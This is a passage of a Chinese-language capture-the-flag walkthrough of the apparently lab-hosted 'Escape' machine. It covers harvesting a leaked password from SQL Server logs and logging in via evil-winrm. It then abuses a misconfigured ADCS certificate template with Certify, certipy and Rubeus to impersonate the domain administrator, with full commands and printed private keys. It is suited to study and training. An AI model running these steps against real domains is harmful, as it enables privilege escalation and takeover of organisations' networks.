2022-11-18 13:43:06.89 Server      The SQL Server Network Interface library could not register the Service Principal Name (SPN) [ MSSQLSvc/dc.sequel.htb:SQLMOCK ] for the SQL Server service. Windows return code: 0x2098, state: 15. Failure to register a SPN might cause integrated authentication to use NTLM instead of Kerberos. This is an informational message. Further action is only required if Kerberos authentication is required by authentication policies and if the SPN has not been manually registered.
2022-11-18 13:43:06.89 spid14s     Database 'model' running the upgrade step from version 901 to version 902.
2022-11-18 13:43:06.89 spid14s     Database 'model' running the upgrade step from version 902 to version 903.
2022-11-18 13:43:06.89 spid14s     Database 'model' running the upgrade step from version 903 to version 904.
2022-11-18 13:43:07.00 spid14s     Clearing tempdb database.
2022-11-18 13:43:07.06 spid14s     Starting up database 'tempdb'.
2022-11-18 13:43:07.17 spid9s      Database 'msdb' running the upgrade step from version 902 to version 903.
2022-11-18 13:43:07.17 spid9s      Database 'msdb' running the upgrade step from version 903 to version 904.
2022-11-18 13:43:07.29 spid9s      Recovery is complete. This is an informational message only. No user action is required.
2022-11-18 13:43:07.30 spid51      Changed database context to 'master'.
2022-11-18 13:43:07.30 spid51      Changed language setting to us_english.
2022-11-18 13:43:07.33 spid51      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2022-11-18 13:43:07.34 spid51      Configuration option 'default language' changed from 0 to 0. Run the RECONFIGURE statement to install.
2022-11-18 13:43:07.34 spid51      Configuration option 'default full-text language' changed from 1033 to 1033. Run the RECONFIGURE statement to install.
2022-11-18 13:43:07.34 spid51      Configuration option 'show advanced options' changed from 1 to 0. Run the RECONFIGURE statement to install.
2022-11-18 13:43:07.39 spid51      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2022-11-18 13:43:07.39 spid51      Configuration option 'user instances enabled' changed from 1 to 1. Run the RECONFIGURE statement to install.
2022-11-18 13:43:07.39 spid51      Configuration option 'show advanced options' changed from 1 to 0. Run the RECONFIGURE statement to install.
2022-11-18 13:43:07.44 spid51      Changed database context to 'master'.
2022-11-18 13:43:07.44 spid51      Changed language setting to us_english.
2022-11-18 13:43:07.44 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.44 Logon       Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon       Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.72 spid51      Attempting to load library 'xpstar.dll' into memory. This is an informational message only. No user action is required.
2022-11-18 13:43:07.76 spid51      Using 'xpstar.dll' version '2019.150.2000' to execute extended stored procedure 'xp_sqlagent_is_starting'. This is an informational message only; no user action is required.
2022-11-18 13:43:08.24 spid51      Changed database context to 'master'.
2022-11-18 13:43:08.24 spid51      Changed language setting to us_english.
2022-11-18 13:43:09.29 spid9s      SQL Server is terminating in response to a 'stop' request from Service Control Manager. This is an informational message only. No user action is required.
2022-11-18 13:43:09.31 spid9s      .NET Framework runtime has been stopped.
2022-11-18 13:43:09.43 spid9s      SQL Trace was stopped due to server shutdown. Trace ID = '1'. This is an informational message only; no user action is required.

15、在这个文件中发现了另一个用户的账号密码，这里就直接尝试登录并获取最终的flag吧

┌──(kali㉿offsec)-[~/Desktop]
└─$ evil-winrm -i 10.10.11.202 -u Ryan.Cooper -p 'NuclearMosquito3'                                         
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> whoami
sequel\ryan.cooper
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> ls


    Directory: C:\Users\Ryan.Cooper\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        4/22/2024   1:30 PM             34 user.txt


*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> cat user.txt
eb527cd5d75d332b9b106092b84fc354
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop>

0x02 系统权限获取

16、开始在域内环境枚举。

*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> net time /domain
Current time at \\dc.sequel.htb is 4/22/2024 2:45:21 PM

The command completed successfully.

*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> 


*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> net user Ryan.Cooper
User name                    Ryan.Cooper
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            2/1/2023 2:52:57 PM
Password expires             Never
Password changeable          2/2/2023 2:52:57 PM
Password required            Yes
User may change password     No

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   2/7/2023 10:13:56 AM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *Domain Users
The command completed successfully.

*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop>

17、其实这里，我并没有发现什么，触及到知识盲区了，故查看了下演练报告

18、在Windows域上总是需要枚举的一件事是查找Active Directory证书服务(ADCS)。检查这一点的一个快速方法是使用crackmapexec(它可以作为sql_svc或Ryan.Cooper用户):

┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec ldap 10.10.11.202 -u ryan.cooper -p NuclearMosquito3 -M adcs
SMB         10.10.11.202    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
LDAPS       10.10.11.202    636    DC               [+] sequel.htb\ryan.cooper:NuclearMosquito3 
ADCS                                                Found PKI Enrollment Server: dc.sequel.htb
ADCS                                                Found CN: sequel-DC-CA

19、识别易受攻击模板，随着ADCS的运行，下一个问题是这个ADCS中是否有任何不安全模板配置。为了进一步枚举，通过从SharpCollection下载一个Certify并将其上传到Escape:

*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> upload /home/kali/Desktop/tools/Certify.exe
                                        
Info: Uploading /home/kali/Desktop/tools/Certify.exe to C:\Users\Ryan.Cooper\Desktop\Certify.exe
                                        
Data: 236884 bytes of 236884 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop>

20、Certify的README介绍了如何列举和滥用证书服务。首先，显示运行Certify.exe find /vulnerable 默认，这将查看标准低权限组。或加上 /currentuser来跨组查找当前用户，这两种方法都可以。在打印有关企业CA的一些信息后，列出一个易受攻击的证书模板:

*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> .\Certify.exe find /vulnerable /currentuser

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.1.0

[*] Action: Find certificate templates
[*] Using current user's unrolled group SIDs for vulnerability checks.
[*] Using the search base 'CN=Configuration,DC=sequel,DC=htb'

[*] Listing info about the Enterprise CA 'sequel-DC-CA'

    Enterprise CA Name            : sequel-DC-CA
    DNS Hostname                  : dc.sequel.htb
    FullName                      : dc.sequel.htb\sequel-DC-CA
    Flags                         : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
    Cert SubjectName              : CN=sequel-DC-CA, DC=sequel, DC=htb
    Cert Thumbprint               : A263EA89CAFE503BB33513E359747FD262F91A56
    Cert Serial                   : 1EF2FA9A7E6EADAD4F5382F4CE283101
    Cert Start Date               : 11/18/2022 12:58:46 PM
    Cert End Date                 : 11/18/2121 1:08:46 PM
    Cert Chain                    : CN=sequel-DC-CA,DC=sequel,DC=htb
    UserSpecifiedSAN              : Disabled
    CA Permissions                :
      Owner: BUILTIN\Administrators        S-1-5-32-544

      Access Rights                                     Principal

      Allow  Enroll                                     NT AUTHORITY\Authenticated UsersS-1-5-11
      Allow  ManageCA, ManageCertificates               BUILTIN\Administrators        S-1-5-32-544
      Allow  ManageCA, ManageCertificates               sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
      Allow  ManageCA, ManageCertificates               sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
    Enrollment Agent Restrictions : None

[!] Vulnerable Certificates Templates :

    CA Name                               : dc.sequel.htb\sequel-DC-CA
    Template Name                         : UserAuthentication
    Schema Version                        : 2
    Validity Period                       : 10 years
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Encrypting File System, Secure Email
    mspki-certificate-application-policy  : Client Authentication, Encrypting File System, Secure Email
    Permissions
      Enrollment Permissions
        Enrollment Rights           : sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequel\Domain Users           S-1-5-21-4078382237-1492182817-2568127209-513
                                      sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
      Object Control Permissions
        Owner                       : sequel\Administrator          S-1-5-21-4078382237-1492182817-2568127209-500
        WriteOwner Principals       : sequel\Administrator          S-1-5-21-4078382237-1492182817-2568127209-500
                                      sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
        WriteDacl Principals        : sequel\Administrator          S-1-5-21-4078382237-1492182817-2568127209-500
                                      sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
        WriteProperty Principals    : sequel\Administrator          S-1-5-21-4078382237-1492182817-2568127209-500
                                      sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519



Certify completed in 00:00:09.9605849
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop>

21、这里的危险在sequel\Domain Users拥有证书注册权限(这是Certify README文件中的场景3)

1
2
3

https://github.com/ly4k/Certipy

https://book.hacktricks.xyz/v/cn/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation

22、滥用模板，方法1: certipy 确实可以看到，实际上存在一个名为UserAuthentication的易受攻击的模板。特别，可以看到经过Authenticated Users可以注册此模板，并且由于msPKI-Certificate-Name-Flag存在并且包含ENROLLEE_SUPPLIES_SUBJECT，因此该模板容易受到Investigating Certificate Template Enrollment Attacks – (ADCS)攻击。本质上讲，这允许任何人注册该模板并指定任意主题替代名称。这意味着，可以通过利用此攻击路径作为域管理员进行身份验证。为了利用这一点，使用certipy

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.11.202 dc.sequel.htb sequel.htb" | sudo tee -a /etc/hosts
[sudo] kali 的密码：
10.10.11.202 dc.sequel.htb sequel.htb

┌──(kali㉿offsec)-[~/Desktop]
└─$ ntpdate -u dc.sequel.htb                                             
2024-04-25 04:47:10.603853 (+0800) +229.172548 +/- 0.062410 dc.sequel.htb 10.10.11.202 s1 no-leap
CLOCK: step_systime: Operation not permitted

┌──(kali㉿offsec)-[~/Desktop]
└─$ certipy-ad req -u ryan.cooper@sequel.htb -p NuclearMosquito3 -upn administrator@sequel.htb -target sequel.htb -ca sequel-DC-CA -template UserAuthentication
Certipy v4.7.0 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 11
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

23、现在有了administrator的证书，可以再次使用certipy来获得Ticket Granting Ticket (TGT)，并提取该用户的NT hash。由于这一步需要一些Kerberos交互，因此需要将时钟同步到远程机器的时间，然后才能继续。

┌──(kali㉿offsec)-[~/Desktop]
└─$ certipy-ad auth -pfx administrator.pfx
Certipy v4.7.0 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)

24、这里涉及到证书存在问题了，无法正确获取目标账号的哈希值了，那就换个方法吧。

25、可以继续使用README场景3，接下来运行Certify.exe以请求具有管理员替代名称的证书。它返回一个cert.pem:

*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> .\Certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:administrator

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.1.0

[*] Action: Request a Certificates

[*] Current user context    : sequel\Ryan.Cooper
[*] No subject name specified, using current context as subject.

[*] Template                : UserAuthentication
[*] Subject                 : CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] AltName                 : administrator

[*] Certificate Authority   : dc.sequel.htb\sequel-DC-CA

[*] CA Response             : The certificate had been issued.
[*] Request ID              : 15

[*] cert.pem         :

-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAv29J48HhmM/ezRaKeJxd1gTkk9CqYDFr+1TBWhyLxzfu/cWc
s8aCYSPVEJ9C7zHqEgcjFRQlXpL8UhXVDAtUwrFAP3Yz/1xd9usNqSzOdXDWAiJp
xemoBhI/W6PUy0raYjSGBcTP0tkqMZ6AFEysrs32K2MmHL4Fs6mXei8Mc5mw8QR4
FF+uQRK0Cli9uIV3+a19Q+WNXJmg1bl5BJfiKdEOsivO4sxE+/b1r56wuU7Z+X6T
4JKbY3d9SV1x/LzumL/ezgCXHWviHQuiczH09K1KXrr5NpEfEAitUgoxW6zw54S5
Vs65dDWVbCu3iaEmvlfPT2cHdywvSsiwX9CPCQIDAQABAoIBAG1YagI4Kl4YzhCj
QXDnEApBPTbZR5guYplqrg6Eo6qlXlOB3qIpTyuhRgB6l8b84dBuVzGhEj9VAd75
LXn1tvKGQEZ/g+/mmJ2DYYgyWbNnQjZx5azwa9Mb9SipCdEc7mSNz8fXxUWQWbOB
73Ko4THv3x6lQY3FVIhs5GMcIKaeNBr+VNajutdL8HYWMULjyreQTf1cdQKYN2En
tfcfowoBeSPbQTq8k8PT6Du1gnkTWNNzacISBaq967bkdvUddD9wz2zl/q8hY+mA
hu086BdmXDr+1r4laB8mxJkS+vm3QpB3fxDYx8aX7HwaVygCiXD049nl9wOTzs0G
OFRqRWkCgYEA5AQF4NYAKSmGuVT9v/prenYccbU4Z+0iGF5U5jHdkVDG+Okp/76g
HZfrMFEnAgnk4uyTVKrinMnUg9CE1MudGm4AFZG3NbZ4+uicjddCV48C5YjIiFLx
nkm06QYJ1rLQ2NmvhsGI4VcbxAVu945HhGlqME0Qw7CJFQO7t69SOWsCgYEA1u3v
bHe+9uGHhaux2N/kJSDLiGSvBHq3DRY4m0+lcWcI4yfwcfGKQEDpNS82vaTwMh4j
HGB8TzWk2F3/BW4mbPcAE+AF2CRFXurDr53km+56RAAs8Ocmm0qYZtcafcdG1JzU
ZNFfVamxZbSK3B0mK3cCkcOWF0lVMY0A7RKt8lsCgYEAmApmsQmBifD6uNIHcd/V
kw724ItqVUI2HfGowuY1TBSE2K0BKFtAAPuwA8PZMu7OBNKjWy2ndczPPCXqrMoo
s9rti3RiqhpGiWhaG+qRfjkKQWv3648DNf0H+Onh3ZvWzwI4nK6oSzn+dbL5z3C8
F3sDJ7n7l8E7ZxvaLB1nwokCgYACXiivFzqhWaa2kEerTfwjdJMJc6KB+CAgIsiI
3X3DHBF6/yuk9bZCMvTewyBlQnXq924HmACGlt60C4UNuELwHGCB14v4751cCFYT
jze/iAcMzLuyA7nnKBE5wNDn5dQf74Jfgfb86JuttSl6d0++VtdOZ8s1gndPzm/e
LMCB1QKBgHFEH47/QjQmMpI6gIik89HkDlcUxWEglEl7qdz3bepslJQgEINTQxQW
3K3hvRK45iToelrgP8rbXKeB64n5Um9yPGFqYMMbWGcIWTy6T1hsqm//W0mXQGr3
9hmkKl1QQPa6ICmsRP+lKMQ45qmbxkgnLURFq5VZcCnoQqohPZk3
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIGEjCCBPqgAwIBAgITHgAAAA+4D/j6Ri4ZCwAAAAAADzANBgkqhkiG9w0BAQsF
ADBEMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGc2VxdWVs
MRUwEwYDVQQDEwxzZXF1ZWwtREMtQ0EwHhcNMjQwNDI0MjA1NDA0WhcNMjYwNDI0
MjEwNDA0WjBTMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYG
c2VxdWVsMQ4wDAYDVQQDEwVVc2VyczEUMBIGA1UEAxMLUnlhbi5Db29wZXIwggEi
MA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQC/b0njweGYz97NFop4nF3WBOST
0KpgMWv7VMFaHIvHN+79xZyzxoJhI9UQn0LvMeoSByMVFCVekvxSFdUMC1TCsUA/
djP/XF326w2pLM51cNYCImnF6agGEj9bo9TLStpiNIYFxM/S2SoxnoAUTKyuzfYr
YyYcvgWzqZd6LwxzmbDxBHgUX65BErQKWL24hXf5rX1D5Y1cmaDVuXkEl+Ip0Q6y
K87izET79vWvnrC5Ttn5fpPgkptjd31JXXH8vO6Yv97OAJcda+IdC6JzMfT0rUpe
uvk2kR8QCK1SCjFbrPDnhLlWzrl0NZVsK7eJoSa+V89PZwd3LC9KyLBf0I8JAgMB
AAGjggLsMIIC6DA9BgkrBgEEAYI3FQcEMDAuBiYrBgEEAYI3FQiHq/N2hdymVof9
lTWDv8NZg4nKNYF338oIhp7sKQIBZAIBBTApBgNVHSUEIjAgBggrBgEFBQcDAgYI
KwYBBQUHAwQGCisGAQQBgjcKAwQwDgYDVR0PAQH/BAQDAgWgMDUGCSsGAQQBgjcV
CgQoMCYwCgYIKwYBBQUHAwIwCgYIKwYBBQUHAwQwDAYKKwYBBAGCNwoDBDBEBgkq
hkiG9w0BCQ8ENzA1MA4GCCqGSIb3DQMCAgIAgDAOBggqhkiG9w0DBAICAIAwBwYF
Kw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFFemkoexIK/ty2oFkCP78FsPBUxb
MCgGA1UdEQQhMB+gHQYKKwYBBAGCNxQCA6APDA1hZG1pbmlzdHJhdG9yMB8GA1Ud
IwQYMBaAFGKfMqOg8Dgg1GDAzW3F+lEwXsMVMIHEBgNVHR8EgbwwgbkwgbaggbOg
gbCGga1sZGFwOi8vL0NOPXNlcXVlbC1EQy1DQSxDTj1kYyxDTj1DRFAsQ049UHVi
bGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlv
bixEQz1zZXF1ZWwsREM9aHRiP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q/YmFz
ZT9vYmplY3RDbGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCBvQYIKwYBBQUHAQEE
gbAwga0wgaoGCCsGAQUFBzAChoGdbGRhcDovLy9DTj1zZXF1ZWwtREMtQ0EsQ049
QUlBLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNv
bmZpZ3VyYXRpb24sREM9c2VxdWVsLERDPWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/
b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTANBgkqhkiG9w0BAQsF
AAOCAQEAMCrAESor2pBXyIS3nC2K35FgE+GqjSHXrRsN3EINAZ78ejcSFAg1DkNy
/nzao5JmBcpedZ6pch4A9BqyIb79gxV+1GvlPTEiC0UbBBprIFPxQiuhwzI1WkuB
ryR/zfvJB1E6IbyjwkLxYkDqhMTaPDEA2n8hmXTyhoirPjZ6anOcys+hGeAoYgjF
PrkMFjmjzOfh44Q+0O3prdIPkixTejeLpECxgF2HK4JfOoSyTblpfRL59jGsb2S7
I4Luky/hZfE0098t3IM6xpn/pXr48TsU8DN1oTciGM0GbyonoIqhh8NLGQ/iN0NP
3eeg/LvzLQh+T8Z4+dYl3YEmeyG/Sg==
-----END CERTIFICATE-----


[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx



Certify completed in 00:00:19.7676051
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop>

26、把上面的秘钥文件创建并复制到 cert.pem 文件里，README和输出的末尾都显示了下一步。把从—–BEGIN RSA PRIVATE KEY—–到—–END CERTIFICATE—–的所有内容复制到kali的主机上的一个文件中，并使用给定的命令将其转换为.pfx，在提示时不输入密码:

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
[sudo] kali 的密码：
Enter Export Password:
Verifying - Enter Export Password:

27、这里不知道为啥，我kali生成的证书是存在问题的，无法使用的

shiyan@InfoSec Desktop % openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Enter Export Password:
Verifying - Enter Export Password:
shiyan@InfoSec Desktop %

28、上传cert.pfx和Rubeus.exe，以及Rubeus(从SharpCollection下载)，然后运行asktgt命令，将证书传递给它以administrator身份获得TGT:

*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> upload /home/kali/Desktop/cert.pfx
                                        
Info: Uploading /home/kali/Desktop/cert.pfx to C:\Users\Ryan.Cooper\Desktop\cert.pfx
                                        
Data: 4564 bytes of 4564 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> upload /home/kali/Desktop/tools/Ru
/home/kali/Desktop/tools/Rubeus  /home/kali/Desktop/tools/RunasCs
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> upload /home/kali/Desktop/tools/Rubeus/Rubeus.exe
                                        
Info: Uploading /home/kali/Desktop/tools/Rubeus/Rubeus.exe to C:\Users\Ryan.Cooper\Desktop\Rubeus.exe
                                        
Data: 369320 bytes of 369320 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop>

.\Rubeus.exe asktgt /user:administrator /certificate:C:\Users\Ryan.Cooper\Desktop\cert.pfx

29、这里不行，我kali生成的证书，包括我macbook生成的证书都是有问题的，下面我们用HTB的虚拟机进行结束这个步骤把。

30、杂感觉是靶机的问题，重置一下靶机看看吧。。。。

31、继续参考演练报告，开始操作

*Evil-WinRM* PS C:\> cd programdata
*Evil-WinRM* PS C:\programdata> ls


    Directory: C:\programdata


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d---s-       11/19/2022   3:45 AM                Microsoft
d-----         2/6/2023  12:09 PM                Package Cache
d-----         2/6/2023   2:52 PM                regid.1991-06.com.microsoft
d-----        9/15/2018  12:19 AM                SoftwareDistribution
d-----         2/2/2023   1:13 PM                ssh
d-----        7/20/2021  12:22 PM                USOPrivate
d-----        7/20/2021  12:22 PM                USOShared
d-----        7/20/2021  12:27 PM                VMware


*Evil-WinRM* PS C:\programdata> upload /home/kali/Desktop/tools/Certify.exe
                                        
Info: Uploading /home/kali/Desktop/tools/Certify.exe to C:\programdata\Certify.exe
                                        
Data: 236884 bytes of 236884 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\programdata> upload /home/kali/Desktop/tools/Rubeus/Rubeus.exe
                                        
Info: Uploading /home/kali/Desktop/tools/Rubeus/Rubeus.exe to C:\programdata\Rubeus.exe
                                        
Data: 369320 bytes of 369320 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\programdata> .\Certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:administrator

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.1.0

[*] Action: Request a Certificates

[*] Current user context    : sequel\Ryan.Cooper
[*] No subject name specified, using current context as subject.

[*] Template                : UserAuthentication
[*] Subject                 : CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] AltName                 : administrator

[*] Certificate Authority   : dc.sequel.htb\sequel-DC-CA

[*] CA Response             : The certificate had been issued.
[*] Request ID              : 13

[*] cert.pem         :

-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEA0AJbHSPCGCGumVMRgF895X9ChYTNbr/hiG49KY9HzlWrvteF
6tvqoE2jm4ieFX4r2sYEJR+wgFhsW9cMr8dd9TrGjRFM10I1Fg/H7dGvvablSPRK
/PHZOqv8GESjiqa/kCTxrMWc7+fC4IlXueV2/Auurdhqcw+DJRZqvIp5fGb0WQ/o
iZ2epvxPj4h9GWQ+4Gub1jVIL1uU9IBEWbNBEMyu7aAF2oqcjjgpjptGhX/n1N5R
XVhV4KGCgnqdd4rjCp7PJYKE5tmlwVGxbfZJUUZ3Y4+lYhPqhZ6/ECrXTSv8lwhy
MYG4FAaF/KvWf91T0XO2xxepkljrrgb/HMbawQIDAQABAoIBAHngF4CgVfYLriB5
8nQz2bFg+hn/MNrmJH/qj32NTPZRbfq4jueICRX5x5W222EedxWNFhqmUaUxqfO5
sd5AQwYPdQxsiYhKa45Mmsj2JjFJ22f+cv13ut7MrD2P4f64Kt+LNesUMhrCwYUM
E9GA6FFPiv6jIePev+l4E/v6aqn/Hi9MKQeFte8J5PohiZNhpkE+8eDDGtE46xrg
xQW3YR4MOCCgL56kciPHLnd3IWjF3sKFKGP8f/mCYQD5DQl1zjACt7otq61EiDrK
gLqk0wgZ+/PscsmknWfvE+Zq6bnitinGW1U8d0twVgMxZtljUoXMOQxqWhzNCqCR
FAJYgj0CgYEA7y8wSKTE6nb0eOTFSlce/3AVGjnDf4peb1I6T9LTmTA4mDIfLx1E
qTs6Sg4Eax5NtOpdcPObDPLCqgrZt6aqsEIqYt3CClOg3ZsMwbHJkkWUtXIGAI6T
gJnWXkpf9H6KNaMMkctwkKVN6EF3dS2KRtbd09zxvEf+DxV3dsG7wIcCgYEA3qIU
vmkBSCjpXUOCfDbzuLB4ufKnS2z7hKNBDkOn6KSMSZTaf+DTup1TJ1VMKaAzzwfk
MyXHQjxRHJ68XyfaOHbi+WlL+Fa5uoHJapxRGtQqiKEZfVFgI6Yca9s1KT5g6/vv
GHMU/0x7lAVUmBPm0mIYt60Jh4G8P4BJ5ntfxHcCgYEAgiBzLWJvO3xiPw9/gpVp
aOFKqcz5Xn8iJ4Bd9yWlNzdz4uGJ87EBtOxjJvz/TGPdNOs40QXHukCsxaRHlNHZ
FTG6K7WoJsQexdHgG9Uk7C5s3FZfi5gGCbYoWX4vPC5H9Sxy3zMGV7uHai+L1TVk
gGvPnb8bySqFvyEXsIVwJysCgYA6xAe7txXqiToILzC7PvoYTySe2KlGJI9DlKAw
drVUmFKbfZorVRouUSbI5CAFgM8MH+YhhiBRoIA8kL3iVC+q5d7FvQCbnbDKxUV4
Saiy7zwG8pc62AcLgeZQpf0jVN7ai5ayGnZ5aSPZj4qj1eUAtXoWyasRRLJ/BIr9
NqWxwwKBgEP4Wo5OuuPQn0N0qMzSv07GZaqLCFrLEz/YKBqQGGJJpRrFRIvFhrV2
x/79+2Y8DSBAbuL3kBv6n0uLsqWLGPzE93zYVzy4Wp+Tr78/byQkYgvt1SCMWXgS
40Dc9e9SelO1LqHkg/FDcAXGuSZ2/PiCTEIOSlx/QC97dYMavBh1
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIGEjCCBPqgAwIBAgITHgAAAA3//bzjf9te+QAAAAAADTANBgkqhkiG9w0BAQsF
ADBEMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGc2VxdWVs
MRUwEwYDVQQDEwxzZXF1ZWwtREMtQ0EwHhcNMjQwNDI0MjE0ODExWhcNMjYwNDI0
MjE1ODExWjBTMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYG
c2VxdWVsMQ4wDAYDVQQDEwVVc2VyczEUMBIGA1UEAxMLUnlhbi5Db29wZXIwggEi
MA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDQAlsdI8IYIa6ZUxGAXz3lf0KF
hM1uv+GIbj0pj0fOVau+14Xq2+qgTaObiJ4VfivaxgQlH7CAWGxb1wyvx131OsaN
EUzXQjUWD8ft0a+9puVI9Er88dk6q/wYRKOKpr+QJPGsxZzv58LgiVe55Xb8C66t
2GpzD4MlFmq8inl8ZvRZD+iJnZ6m/E+PiH0ZZD7ga5vWNUgvW5T0gERZs0EQzK7t
oAXaipyOOCmOm0aFf+fU3lFdWFXgoYKCep13iuMKns8lgoTm2aXBUbFt9klRRndj
j6ViE+qFnr8QKtdNK/yXCHIxgbgUBoX8q9Z/3VPRc7bHF6mSWOuuBv8cxtrBAgMB
AAGjggLsMIIC6DA9BgkrBgEEAYI3FQcEMDAuBiYrBgEEAYI3FQiHq/N2hdymVof9
